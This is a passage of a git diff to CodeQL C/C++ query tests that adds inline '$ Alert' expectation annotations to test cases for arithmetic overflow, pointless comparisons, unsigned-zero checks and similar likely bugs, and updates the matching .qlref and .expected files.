long ulong1, ulong2, ulong3, ulong4, ulong5; ulong1 = (uchar1 + 1) * (uchar2 + 1); // GOOD - ulong2 = (i + 1) * (uchar2 + 1); // BAD + ulong2 = (i + 1) * (uchar2 + 1); // BAD // $ Alert ulong3 = (uchar1 + 1) * (uchar2 + 1) * (uchar3 + 1); // GOOD ulong4 = (uchar1 + (uchar1 + 1)) * (uchar2 + 1); // GOOD - ulong5 = (i + (uchar1 + 1)) * (uchar2 + 1); // BAD + ulong5 = (i + (uchar1 + 1)) * (uchar2 + 1); // BAD // $ Alert ulong5 = (uchar1 + 1073741824) * uchar2; // BAD [NOT DETECTED] ulong5 = (uchar1 + (1 << 30)) * uchar2; // BAD [NOT DETECTED] ulong5 = uchar1 * uchar1 * uchar1 * uchar2 * uchar2 * uchar2; // BAD [NOT DETECTED] - ulong5 = (uchar1 + (unsigned short)(-1)) * (uchar2 + (unsigned short)(-1)); // BAD + ulong5 = (uchar1 + (unsigned short)(-1)) * (uchar2 + (unsigned short)(-1)); // BAD // $ Alert } struct A { @@ -116,13 +116,13 @@ struct A { void g2(struct A* a, short n) { unsigned long ulong1, ulong2; ulong1 = (a->s - 1) * ((*a).s + 1); // GOOD - ulong2 = a->i * (*a).i; // BAD + ulong2 = a->i * (*a).i; // BAD // $ Alert } int global_i; unsigned char global_uchar; void g3() { unsigned long ulong1, ulong2; - ulong1 = global_i * global_i; // BAD + ulong1 = global_i * global_i; // BAD // $ Alert ulong2 = (global_uchar + 1) * 2; // GOOD } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.cpp index 28f22194ff7a..4266c3c3af58 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.cpp @@ -1,5 +1,5 @@ int i = 2000000000; -long j = i * i; // BAD +long j = i * i; // BAD // $ Alert long k = (long) i * i; // GOOD long l = (long) (i * i); // permitted as the conversion is explicit long m = static_cast (i) * i; // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.qlref index d2ced0155755..4616a5ea9dc8 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/IntMultToLong/IntMultToLong.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/IntMultToLong.ql +query: Likely Bugs/Arithmetic/IntMultToLong.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/ConstVirtual.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/ConstVirtual.cpp index b04f344c26ab..c993f180005a 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/ConstVirtual.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/ConstVirtual.cpp @@ -21,7 +21,7 @@ int g(C *c, int i) { return -1; } - if (i > 0) { // BAD + if (i > 0) { // BAD // $ Alert[cpp/constant-comparison] return 1; } else { return 0; diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.c b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.c index fd1bc655051d..71447e6d88db 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.c @@ -4,19 +4,19 @@ void myFunction1() { for (i = 0;; i = i+1) { - if (i < 20) result++; - if (i <= 20) result++; - if (i > 20) result++; - if (i >= 20) result++; - if (i == 20) result++; - if (i != 20) result++; - - if (i < -1) result++; - if (i <= -1) result++; - if (i > -1) result++; - if (i >= -1) result++; - if (i == -1) result++; - if (i != -1) result++; + if (i < 20) result++; // $ Alert[cpp/constant-comparison] + if (i <= 20) result++; // $ Alert[cpp/constant-comparison] + if (i > 20) result++; // $ Alert[cpp/constant-comparison] + if (i >= 20) result++; // $ Alert[cpp/constant-comparison] + if (i == 20) result++; // $ Alert[cpp/constant-comparison] + if (i != 20) result++; // $ Alert[cpp/constant-comparison] + + if (i < -1) result++; // $ Alert[cpp/constant-comparison] + if (i <= -1) result++; // $ Alert[cpp/constant-comparison] + if (i > -1) result++; // $ Alert[cpp/constant-comparison] + if (i >= -1) result++; // $ Alert[cpp/constant-comparison] + if (i == -1) result++; // $ Alert[cpp/constant-comparison] + if (i != -1) result++; // $ Alert[cpp/constant-comparison] if (i < 5) result++; if (i <= 5) result++; @@ -35,19 +35,19 @@ void myFunction2() { for (i = 0;; i++) { - if (i < 20) result++; - if (i <= 20) result++; - if (i > 20) result++; - if (i >= 20) result++; - if (i == 20) result++; - if (i != 20) result++; + if (i < 20) result++; // $ Alert[cpp/constant-comparison] + if (i <= 20) result++; // $ Alert[cpp/constant-comparison] + if (i > 20) result++; // $ Alert[cpp/constant-comparison] + if (i >= 20) result++; // $ Alert[cpp/constant-comparison] + if (i == 20) result++; // $ Alert[cpp/constant-comparison] + if (i != 20) result++; // $ Alert[cpp/constant-comparison] - if (i < -1) result++; - if (i <= -1) result++; - if (i > -1) result++; - if (i >= -1) result++; - if (i == -1) result++; - if (i != -1) result++; + if (i < -1) result++; // $ Alert[cpp/constant-comparison] + if (i <= -1) result++; // $ Alert[cpp/constant-comparison] + if (i > -1) result++; // $ Alert[cpp/constant-comparison] + if (i >= -1) result++; // $ Alert[cpp/constant-comparison] + if (i == -1) result++; // $ Alert[cpp/constant-comparison] + if (i != -1) result++; // $ Alert[cpp/constant-comparison] if (i < 5) result++; if (i <= 5) result++; @@ -62,7 +62,7 @@ void myFunction2() { int myFunction3(int i) { if (i < 4) { - if (i < 5) { + if (i < 5) { // $ Alert[cpp/constant-comparison] return 1; } } @@ -100,11 +100,11 @@ int myFunction4() { // Pointless checks for unsigned values being negative int unsignedBounds(unsigned int a, unsigned long b, unsigned long long c) { - if (a < 0) { + if (a < 0) { // $ Alert[cpp/constant-comparison] return 1; } - if (b >= 0) { // UnsignedGEZero - if (b > 0 && c < 0) { // Only the test of c is bad here + if (b >= 0) { // UnsignedGEZero // $ Alert[cpp/unsigned-comparison-zero] + if (b > 0 && c < 0) { // Only the test of c is bad here // $ Alert[cpp/constant-comparison] return 1; } } @@ -113,20 +113,20 @@ int unsignedBounds(unsigned int a, unsigned long b, unsigned long long c) { int twoReasons(int a, int b) { if (a <= 0 && b > 5) { - return a < b; + return a < b; // $ Alert[cpp/constant-comparison] } if (a <= 100 && b > 105) { // BUG [Not detected - this clause is always false] - return a > b; + return a > b; // $ Alert[cpp/constant-comparison] } return 0; } int repeatedComparisons(int a) { if (a >= 20) { - return a >= 20; + return a >= 20; // $ Alert[cpp/constant-comparison] } if (a <= 3) { - return a > 3; + return a > 3; // $ Alert[cpp/constant-comparison] } return 0; } @@ -194,7 +194,7 @@ int myFunction5(int x) { i++; } d = i; - if (x < 0) { // Comparison is always false. + if (x < 0) { // Comparison is always false. // $ Alert[cpp/constant-comparison] if (d > -x) { // Unreachable code. return 1; } @@ -239,7 +239,7 @@ void macroExpansionTest() { int x; MAYBE_DO(x = 1); // GOOD (the problem is in the macro) - MAYBE_DO(if (global_setting >= 0) {x = 2;}); // BAD (the problem is in the invocation) + MAYBE_DO(if (global_setting >= 0) {x = 2;}); // BAD (the problem is in the invocation) // $ Alert[cpp/unsigned-comparison-zero] } int overeager_wraparound(unsigned int u32bound, unsigned long long u64bound) { @@ -261,7 +261,7 @@ int overeager_wraparound(unsigned int u32bound, unsigned long long u64bound) { int negative_zero(double dbl) { if (dbl >= 0) { - return dbl >= -dbl; // GOOD [FALSE POSITIVE] + return dbl >= -dbl; // GOOD [FALSE POSITIVE] // $ Alert[cpp/constant-comparison] } return 0; } @@ -270,7 +270,7 @@ typedef unsigned char u8; int widening_cast1(u8 c) { if (c == 0) { - if ((int)c > 0) { // BAD + if ((int)c > 0) { // BAD // $ Alert[cpp/constant-comparison] return 1; } } @@ -280,7 +280,7 @@ int widening_cast1(u8 c) { int widening_cast2(u8 c) { if (c <= 10) return -1; - else if ((c >= 11) /* BAD */ && (c <= 47)) + else if ((c >= 11) /* BAD */ && (c <= 47)) // $ Alert[cpp/constant-comparison] return 0; else return 1; @@ -291,7 +291,7 @@ int unsigned_implicit_conversion(unsigned int ui1) { // implicit signedness conversion is on the constants (0 and 5), not on the // variables (ui1). if (ui1 == 0) { - if (ui1 >= 5) { // BAD + if (ui1 >= 5) { // BAD // $ Alert[cpp/constant-comparison] return 1; } } @@ -300,7 +300,7 @@ int unsigned_implicit_conversion(unsigned int ui1) { int signedness_cast1(u8 c) { if ((signed char)c == 0) { - if (c >= 5) { // BAD + if (c >= 5) { // BAD // $ Alert[cpp/constant-comparison] return 1; } } @@ -309,7 +309,7 @@ int signedness_cast1(u8 c) { int signedness_cast2(signed char c) { if ((u8)c == 0) { - if (c >= 5) { // BAD + if (c >= 5) { // BAD // $ Alert[cpp/constant-comparison] return 1; } } @@ -334,7 +334,7 @@ int nan2(double x) { if (x < 0.0) { return 100; } - else if (x >= 0.0) { // BAD [Always true] + else if (x >= 0.0) { // BAD [Always true] // $ Alert[cpp/constant-comparison] return 200; } else { @@ -369,8 +369,8 @@ void shifts(void) { unsigned int x = 3; - if (x >> 1 >= 1) {} // always true - if (x >> 1 >= 2) {} // always false + if (x >> 1 >= 1) {} // always true // $ Alert[cpp/constant-comparison] + if (x >> 1 >= 2) {} // always false // $ Alert[cpp/constant-comparison] if (x >> 1 == 1) {} // always true [NOT DETECTED] } @@ -380,15 +380,15 @@ void bitwise_ands() if ((x & 2) >= 1) {} if ((x & 2) >= 2) {} - if ((x & 2) >= 3) {} // always false + if ((x & 2) >= 3) {} // always false // $ Alert[cpp/constant-comparison] } void unsigned_mult(unsigned int x, unsigned int y) { if(x < 13 && y < 35) { - if(x * y > 1024) {} // always false + if(x * y > 1024) {} // always false // $ Alert[cpp/constant-comparison] if(x * y < 204) {} if(x >= 3 && y >= 2) { - if(x * y < 5) {} // always false + if(x * y < 5) {} // always false // $ Alert[cpp/constant-comparison] } } } @@ -411,7 +411,7 @@ void mult_overflow() { // to 64-bit unsigned. x = 274177UL; y = 67280421310721UL; - if (x * y == 1) {} // always true [BUG: reported as always false] + if (x * y == 1) {} // always true [BUG: reported as always false] // $ Alert[cpp/constant-comparison] // This bug appears to be caused by // `RangeAnalysisUtils::typeUpperBound(unsigned long)` having a result of diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.cpp index ce04ddcf0814..fe779ad2844b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.cpp @@ -33,13 +33,13 @@ int extreme_values(void) unsigned long long int x = 0xFFFFFFFFFFFFFFFF; unsigned long long int y = 0xFFFFFFFFFFFF; - if (x >> 1 >= 0xFFFFFFFFFFFFFFFF) {} // always false + if (x >> 1 >= 0xFFFFFFFFFFFFFFFF) {} // always false // $ Alert[cpp/constant-comparison] if (x >> 1 >= 0x8000000000000000) {} // always false [NOT DETECTED] if (x >> 1 >= 0x7FFFFFFFFFFFFFFF) {} // always true [NOT DETECTED] if (x >> 1 >= 0xFFFFFFFFFFFFFFF) {} // always true [NOT DETECTED] - if (y >> 1 >= 0xFFFFFFFFFFFF) {} // always false - if (y >> 1 >= 0x800000000000) {} // always false - if (y >> 1 >= 0x7FFFFFFFFFFF) {} // always true - if (y >> 1 >= 0xFFFFFFFFFFF) {} // always true + if (y >> 1 >= 0xFFFFFFFFFFFF) {} // always false // $ Alert[cpp/constant-comparison] + if (y >> 1 >= 0x800000000000) {} // always false // $ Alert[cpp/constant-comparison] + if (y >> 1 >= 0x7FFFFFFFFFFF) {} // always true // $ Alert[cpp/constant-comparison] + if (y >> 1 >= 0xFFFFFFFFFFF) {} // always true // $ Alert[cpp/constant-comparison] } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.qlref index e3713c2911d9..150f789c59dc 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/PointlessComparison.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/PointlessComparison.ql +query: Likely Bugs/Arithmetic/PointlessComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/RegressionTests.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/RegressionTests.cpp index 0ba766eda1d2..2496e5faf299 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/RegressionTests.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/RegressionTests.cpp @@ -54,7 +54,7 @@ static int foo(size_t *size) { int bar; - if (*size <= MAX_VAL) // BAD (pointless comparison) [NO LONGER REPORTED] + if (*size <= MAX_VAL) // BAD (pointless comparison) [NO LONGER REPORTED] // $ Alert[cpp/constant-comparison] *size = MAX_VAL; } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/Templates.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/Templates.cpp index a211b2307805..258ceea379da 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/Templates.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/Templates.cpp @@ -6,7 +6,7 @@ bool sometimesPointless(T param) { template bool alwaysPointless(T param) { short local = param; - return local <= 0xFFFF; // BAD (in all instantiations) + return local <= 0xFFFF; // BAD (in all instantiations) // $ Alert[cpp/constant-comparison] } static int caller(int i) { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/UnsignedGEZero.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/UnsignedGEZero.qlref index 4cf4c8eb0942..7a798dc7e917 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/UnsignedGEZero.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/PointlessComparison/UnsignedGEZero.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/UnsignedGEZero.ql +query: Likely Bugs/Arithmetic/UnsignedGEZero.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/Templates.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/Templates.cpp index a56f9c88c81d..80f2fc6bc878 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/Templates.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/Templates.cpp @@ -6,7 +6,7 @@ bool sometimesPointless(T param) { template bool alwaysPointless(T param) { unsigned int local = param; - return local >= 0; // BAD (in all instantiations) + return local >= 0; // BAD (in all instantiations) // $ Alert } static int caller(int i) { diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.c b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.c index 749468450ef9..4ef600cc877f 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.c @@ -37,7 +37,7 @@ void myFunction() { myEnum1 e1; myEnum2 e2; - if (ui >= 0) { // violation + if (ui >= 0) { // violation // $ Alert } if (ui >= 1) { } @@ -45,21 +45,21 @@ void myFunction() { } if (ui < 0) { } - if (UI >= ZERO) { // violation + if (UI >= ZERO) { // violation // $ Alert } if (si >= 0) { } if (ui_ptr >= NULL) { // unsafe, but not a violation of UnsignedGEZero.ql } - if (uc >= 0) { // violation + if (uc >= 0) { // violation // $ Alert } if (sc >= 0) { } - if (u16 >= 0) { // violation + if (u16 >= 0) { // violation // $ Alert } if (s16 >= 0) { } - if (ull >= 0) { // violation + if (ull >= 0) { // violation // $ Alert } if (sll >= 0) { } @@ -72,33 +72,33 @@ void myFunction() { if (e2 >= 0) { } - if (ui >= const_zero) { // violation + if (ui >= const_zero) { // violation // $ Alert } if (ui >= maybe_zero) { } - if ((unsigned int)si >= 0) { // violation + if ((unsigned int)si >= 0) { // violation // $ Alert } if ((signed int)ui >= 0) { } - if ((unsigned char)ui >= 0) { // violation + if ((unsigned char)ui >= 0) { // violation // $ Alert } if ((signed char)ui >= 0) { } - if ((unsigned char)si >= 0) { // violation + if ((unsigned char)si >= 0) { // violation // $ Alert } if ((signed char)si >= 0) { } - if ((signed int)uc >= 0) { // violation + if ((signed int)uc >= 0) { // violation // $ Alert } - if ((unsigned int)uc >= 0) { // violation + if ((unsigned int)uc >= 0) { // violation // $ Alert } if ((signed int)sc >= 0) { } - if ((unsigned int)sc >= 0) { // violation + if ((unsigned int)sc >= 0) { // violation // $ Alert } - assert(ui >= 0); // violation + assert(ui >= 0); // violation // $ Alert assert(si >= 0); CHECK_RANGE(ui, 0, 10); // reasonable use @@ -108,32 +108,32 @@ void myFunction() { CHECK_RANGE(e2, BANANA, PEAR); CHECK_RANGE(e2, 0, PEAR); - assert(ui >= 0 && ui <= 100); // violation + assert(ui >= 0 && ui <= 100); // violation // $ Alert assert(CHECK_RANGE(ui, 0, 10)); // reasonable use assert(UI >= ZERO); // violation (not detected) - assert(ui GE 0); // violation + assert(ui GE 0); // violation // $ Alert - if ((unsigned char)si >= 0) { // violation + if ((unsigned char)si >= 0) { // violation // $ Alert } - if ((unsigned char)(signed int)si >= 0) { // violation + if ((unsigned char)(signed int)si >= 0) { // violation // $ Alert } - if ((signed int)(unsigned char)si >= 0) { // violation + if ((signed int)(unsigned char)si >= 0) { // violation // $ Alert } - if ((unsigned char)(signed char)si >= 0) { // violation + if ((unsigned char)(signed char)si >= 0) { // violation // $ Alert } if ((signed char)(unsigned char)si >= 0) { } - if ((signed int)(unsigned char)(signed int)si >= 0) { // violation + if ((signed int)(unsigned char)(signed int)si >= 0) { // violation // $ Alert } if ((signed char)(unsigned char)(signed int)si >= 0) { } - if ((signed int)(unsigned char)(signed char)si >= 0) { // violation + if ((signed int)(unsigned char)(signed char)si >= 0) { // violation // $ Alert } if (ui <= 0) { } - if (0 <= ui) { // violation + if (0 <= ui) { // violation // $ Alert } if (0 < ui) { } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.cpp index 6b939e29b76d..c07e278d5b46 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.cpp @@ -37,7 +37,7 @@ void myFunction() { myEnum1 e1; myEnum2 e2; - if (ui >= 0) { // violation + if (ui >= 0) { // violation // $ Alert } if (ui >= 1) { } @@ -45,21 +45,21 @@ void myFunction() { } if (ui < 0) { } - if (UI >= ZERO) { // violation + if (UI >= ZERO) { // violation // $ Alert } if (si >= 0) { } if (ui_ptr >= NULL) { // unsafe, but not a violation of UnsignedGEZero.ql } - if (uc >= 0) { // violation + if (uc >= 0) { // violation // $ Alert } if (sc >= 0) { } - if (u16 >= 0) { // violation + if (u16 >= 0) { // violation // $ Alert } if (s16 >= 0) { } - if (ull >= 0) { // violation + if (ull >= 0) { // violation // $ Alert } if (sll >= 0) { } @@ -72,33 +72,33 @@ void myFunction() { if (e2 >= 0) { } - if (ui >= const_zero) { // violation + if (ui >= const_zero) { // violation // $ Alert } if (ui >= maybe_zero) { } - if ((unsigned int)si >= 0) { // violation + if ((unsigned int)si >= 0) { // violation // $ Alert } if ((signed int)ui >= 0) { } - if ((unsigned char)ui >= 0) { // violation + if ((unsigned char)ui >= 0) { // violation // $ Alert } if ((signed char)ui >= 0) { } - if ((unsigned char)si >= 0) { // violation + if ((unsigned char)si >= 0) { // violation // $ Alert } if ((signed char)si >= 0) { } - if ((signed int)uc >= 0) { // violation + if ((signed int)uc >= 0) { // violation // $ Alert } - if ((unsigned int)uc >= 0) { // violation + if ((unsigned int)uc >= 0) { // violation // $ Alert } if ((signed int)sc >= 0) { } - if ((unsigned int)sc >= 0) { // violation + if ((unsigned int)sc >= 0) { // violation // $ Alert } - assert(ui >= 0); // violation + assert(ui >= 0); // violation // $ Alert assert(si >= 0); CHECK_RANGE(ui, 0, 10); // reasonable use @@ -108,32 +108,32 @@ void myFunction() { CHECK_RANGE(e2, BANANA, PEAR); CHECK_RANGE(e2, 0, PEAR); - assert(ui >= 0 && ui <= 100); // violation + assert(ui >= 0 && ui <= 100); // violation // $ Alert assert(CHECK_RANGE(ui, 0, 10)); // reasonable use assert(UI >= ZERO); // violation (not detected) - assert(ui GE 0); // violation + assert(ui GE 0); // violation // $ Alert - if ((unsigned char)si >= 0) { // violation + if ((unsigned char)si >= 0) { // violation // $ Alert } - if ((unsigned char)(signed int)si >= 0) { // violation + if ((unsigned char)(signed int)si >= 0) { // violation // $ Alert } - if ((signed int)(unsigned char)si >= 0) { // violation + if ((signed int)(unsigned char)si >= 0) { // violation // $ Alert } - if ((unsigned char)(signed char)si >= 0) { // violation + if ((unsigned char)(signed char)si >= 0) { // violation // $ Alert } if ((signed char)(unsigned char)si >= 0) { } - if ((signed int)(unsigned char)(signed int)si >= 0) { // violation + if ((signed int)(unsigned char)(signed int)si >= 0) { // violation // $ Alert } if ((signed char)(unsigned char)(signed int)si >= 0) { } - if ((signed int)(unsigned char)(signed char)si >= 0) { // violation + if ((signed int)(unsigned char)(signed char)si >= 0) { // violation // $ Alert } if (ui <= 0) { } - if (0 <= ui) { // violation + if (0 <= ui) { // violation // $ Alert } if (0 < ui) { } diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.qlref index 4cf4c8eb0942..7a798dc7e917 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/UnsignedGEZero/UnsignedGEZero.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/UnsignedGEZero.ql +query: Likely Bugs/Arithmetic/UnsignedGEZero.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/ContinueInFalseLoop/ContinueInFalseLoop.qlref b/cpp/ql/test/query-tests/Likely Bugs/ContinueInFalseLoop/ContinueInFalseLoop.qlref index 48d9feb20721..2ba384a7922b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ContinueInFalseLoop/ContinueInFalseLoop.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/ContinueInFalseLoop/ContinueInFalseLoop.qlref @@ -1 +1,2 @@ -Likely Bugs/ContinueInFalseLoop.ql +query: Likely Bugs/ContinueInFalseLoop.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/ContinueInFalseLoop/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/ContinueInFalseLoop/test.cpp index 0ece8727e666..ec59c0aca236 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/ContinueInFalseLoop/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/ContinueInFalseLoop/test.cpp @@ -10,7 +10,7 @@ void test1(int x) do { if (cond()) - continue; // BAD + continue; // BAD // $ Alert if (cond()) break; } while (false); @@ -56,7 +56,7 @@ void test1(int x) do { if (cond()) - continue; // BAD + continue; // BAD // $ Alert if (cond()) break; } while (false); diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/ArrayArgSizeMismatch/ArrayArgSizeMismatch.qlref b/cpp/ql/test/query-tests/Likely Bugs/Conversion/ArrayArgSizeMismatch/ArrayArgSizeMismatch.qlref index 2e2747737a9b..2e410dcc8c8c 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/ArrayArgSizeMismatch/ArrayArgSizeMismatch.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/ArrayArgSizeMismatch/ArrayArgSizeMismatch.qlref @@ -1 +1,2 @@ -Likely Bugs/Conversion/ArrayArgSizeMismatch.ql +query: Likely Bugs/Conversion/ArrayArgSizeMismatch.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/ArrayArgSizeMismatch/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/Conversion/ArrayArgSizeMismatch/test.cpp index 52b8f41bf22b..122d6b3a6cca 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/ArrayArgSizeMismatch/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/ArrayArgSizeMismatch/test.cpp @@ -21,7 +21,7 @@ void test(float f3[3], float f4[4], float f5[5], float *fp) f(arr3); // GOOD f(arr4); // GOOD f(arr5); // GOOD - g(arr3); // BAD + g(arr3); // BAD // $ Alert g(arr4); // GOOD g(arr5); // GOOD diff --git a/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.expected b/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.expected index 75e2e581664e..0b8acb7030d6 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Conversion/CastArrayPointerArithmetic/CastArrayPointerArithmetic.expected @@ -1,3 +1,13 @@ +#select +| test.cpp:27:2:27:2 | b | test.cpp:57:19:57:19 | d | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:57:19:57:19 | d | this cast | +| test.cpp:27:2:27:2 | b | test.cpp:74:19:74:21 | dss | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:74:19:74:21 | dss | this cast | +| test.cpp:27:2:27:2 | b | test.cpp:86:19:86:20 | d2 | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:86:19:86:20 | d2 | this cast | +| test.cpp:31:2:31:2 | b | test.cpp:58:25:58:25 | d | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:58:25:58:25 | d | this cast | +| test.cpp:31:2:31:2 | b | test.cpp:75:25:75:27 | dss | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:75:25:75:27 | dss | this cast | +| test.cpp:31:2:31:2 | b | test.cpp:87:25:87:26 | d2 | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:87:25:87:26 | d2 | this cast | +| test.cpp:35:2:35:2 | b | test.cpp:59:21:59:21 | d | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:59:21:59:21 | d | this cast | +| test.cpp:35:2:35:2 | b | test.cpp:76:21:76:23 | dss | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:76:21:76:23 | dss | this cast | +| test.cpp:35:2:35:2 | b | test.cpp:88:21:88:22 | d2 | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:88:21:88:22 | d2 | this cast | edges | test.cpp:26:29:26:29 | b | test.cpp:27:2:27:2 | b | provenance | | | test.cpp:30:34:30:34 | b | test.cpp:31:2:31:2 | b | provenance | | @@ -28,13 +38,3 @@ nodes | test.cpp:87:25:87:26 | d2 | semmle.label | d2 | | test.cpp:88:21:88:22 | d2 | semmle.label | d2 | subpaths -#select -| test.cpp:27:2:27:2 | b | test.cpp:57:19:57:19 | d | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:57:19:57:19 | d | this cast | -| test.cpp:27:2:27:2 | b | test.cpp:74:19:74:21 | dss | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:74:19:74:21 | dss | this cast | -| test.cpp:27:2:27:2 | b | test.cpp:86:19:86:20 | d2 | test.cpp:27:2:27:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:86:19:86:20 | d2 | this cast | -| test.cpp:31:2:31:2 | b | test.cpp:58:25:58:25 | d | test.cpp:31:2:31:2 | b 